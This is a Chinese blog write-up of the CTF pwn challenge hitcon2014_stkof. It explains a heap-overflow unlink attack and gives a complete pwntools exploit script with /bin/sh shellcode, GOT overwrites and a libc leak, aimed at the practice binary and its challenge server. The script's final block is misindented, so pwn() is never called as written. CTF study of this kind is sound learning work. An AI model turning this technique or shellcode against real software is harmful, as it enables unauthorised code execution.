BUUCTF--hitcon2014_stkof

已于 2023-05-03 19:56:46 修改
阅读量103 收藏
点赞数 1
文章标签: python 开发语言
于 2023-05-03 19:55:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73149934/article/details/130476366
版权

题目分析

这题没字符串输出,挺不习惯的

1.add

2.fill

3.delete

4.no_use

。。好像没什么用

exp

漏洞原理:fill函数造成堆溢出

利用思路:该程序没有输出函数,我们肯定是需要泄露libc_base的,因此需要改got表为puts_plt等

考虑unlink修改no_use的strlen_got为puts_plt(这下就有用了),实现泄露libc_base的功能

# !/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:X1n_r1
she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
she_amd64_30=b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
s	= lambda payload		:i.send(payload)
sl  = lambda payload		:i.sendline(payload)
sa  = lambda a,b			:i.sendafter(a,b)
sla = lambda a,b			:i.sendlineafter(a,b)
r   = lambda num   		 :i.recv(num)
ru  = lambda data				:i.recvuntil(data)
rl	= lambda a=False		:i.recvline(a)
uu32 = lambda 				:u32(i.recvuntil(b'\xf7')[-4:].ljust(4,b"\x00") ) 
uu64 = lambda 				:u64(i.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00") )

ep= lambda data 			:elf.plt[data]
eg= lambda data 			:elf.got[data]
es= lambda data           :elf.sym[data]
ls= lambda data 			:libc.sym[data]


c  = lambda num         :cyclic(num) 
itr = lambda 				:i.interactive()
pt = lambda s				:log.info('\033[1;31;40m %s --- %s \033[0m' % (s,type(eval(s))))
lg = lambda name,addr :log.success('\033[1;31;40m{} ==> {:#x}\033[0m'.format(name, addr))
lg1 = lambda name,addr :log.success('\033[01;38;5;214m{} ==> {:#x}\033[0m'.format(name, addr))
pn = lambda name        :print("\033[01;38;5;214mOCT:%d\nHEX:%s \033[0m"%(name,hex(name)))
def dbg():
    gdb.attach(i)
    #pause()

def libcattack(function_name,function_addr):
    global libc_base,binsh,system
    libc=LibcSearcher(function_name,function_addr)
    libc_base=function_addr-libc.dump(function_name)
    system=libc_base+libc.dump("system")
    binsh=libc_base+libc.dump("str_bin_sh")
    lg1("libc_base",libc_base)
    #------------------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
context(os="linux",arch="amd64")#------------
name="./p"#-------------
context.log_level="debug"
elf=ELF(name)
#libc=ELF("")
#------------------------------------------------------------------
choose=1
if choose==1:
    #ENV={"LD_PRELOAD":"/home/xinri/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so"}
    #i=process(["/home/xinri/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so",name],env=ENV)
    i=process(name)
else:
    i=remote("node4.buuoj.cn",27219)

def add(size):
    sl("1")
    sl(str(size))

def fill(index,size,content):
    sl("2")
    sl(str(index))
    sl(str(size))
    s(content)

def delete(index):
    sl("3")
    sl(str(index))

def nouse(index):
    sl("4")
    sl(str(index))
    #------------------------------------------------------------------
def pwn():
    add(0x10)#1
    add(0x80)#2
    add(0x80)#3
    add(0x10)#4
    add(0x10)#5
    content1_ptr=0x0000000000602148+8
    p=p64(0)+p64(0x81)
    p+=p64(content1_ptr-0x18)+p64(content1_ptr-0x10)
    p=p.ljust(0x80,b"a")
    p+=p64(0x80)+p64(0x90)
    fill(2,len(p),p)
    delete(3)

    p=b"a"*0x18+p64(eg("strlen"))+p64(eg("puts"))+p64(eg("free"))#2 3 4
    fill(2,len(p),p)

    p=p64(ep("puts"))
    fill(2,len(p),p)
    nouse(3)
    puts=uu64()
    lg("puts",puts)
    libcattack("puts",puts)

    p=p64(system)
    fill(4,len(p),p)
    fill(5,8,b"/bin/sh\x00")
    delete(5)
    #dbg()

    itr()
    if __name__ == '__main__':
    pwn()

X1NRI
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
[BUUCTF]-PWN:hitcon2014_stkof解析(unlink)
2301_79326813的博客
01-28 741
又是一道堆题,先看保护关键信息,64位,没开pie。再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块内容,以及一个看起来没啥用的函数,当然我也没利用这个函数去解题这里有两种解法。
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 761
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 681
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 674
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 97
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 736
Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 628
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
基数排序算法Python实现
PeterClerk的博客
07-09 556
基数排序算法实现
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 2299
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
java占位符替换五种方式
weixin_61478518的博客
07-08 536
在业务开发中,经常需要输出文本串。其中,部分场景下大部分文本内容是一样的,只有少部分点是不一样。简单做法是直接拼接字段,但是这会有个问题。后面如果想要修改内容,那么每个地方都要修改,这不符合设计模式中的开闭原则,面向应该对扩展开放,对修改关闭。如何解决这个问题?先来看现实生活中的例子,个人信息填写。一般会要填写表格,已经定义好了姓名,性别,年龄等字段,只要填写对应的个人信息就好了。在程序开发中,我们会预先定义好一个字符串模板,需要改动的点使用占位符。
守望数据边界:sklearn中的离群点检测技术
2401_85742452的博客
07-08 766
本文的目的是帮助读者更好地理解离群点检测,并掌握在sklearn中实现这些技术的方法。通过本文,我们了解到了sklearn中不同的离群点检测技术,并提供了实际的代码示例。Isolation Forest是一种基于随机森林的离群点检测方法,它通过随机选择特征和切分点来“孤立”离群点。在实际应用中,离群点检测可以帮助我们识别数据集中的异常行为,从而进行进一步的分析或采取预防措施。评估离群点检测的效果通常比较困难,因为没有绝对的标准。基于密度的方法,如DBSCAN,根据数据点的密度而非固定阈值来识别离群点。
编程学单词:delta(希腊字母Δ/δ),差值表示
m0_57158496的博客
07-11 1000
结语:代码编写中,用“通用”字符命名相应变量,是一个不错的好习惯。其一,不用注释,望文生义,简单明了;其二,代码书写形式风格“标准”统一,方便维护和流转。说明:今天我在堆叠代码时发现有delta样子的单词存在,修习之,对代码书写大有裨益。从今以后,我遇到类似的单词,都将在学习笔记中标识、分享。😋回页目录。
华为910b推理Qwen1.5-72b
weixin_41549308的博客
07-12 528
910b部署推理大模型
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值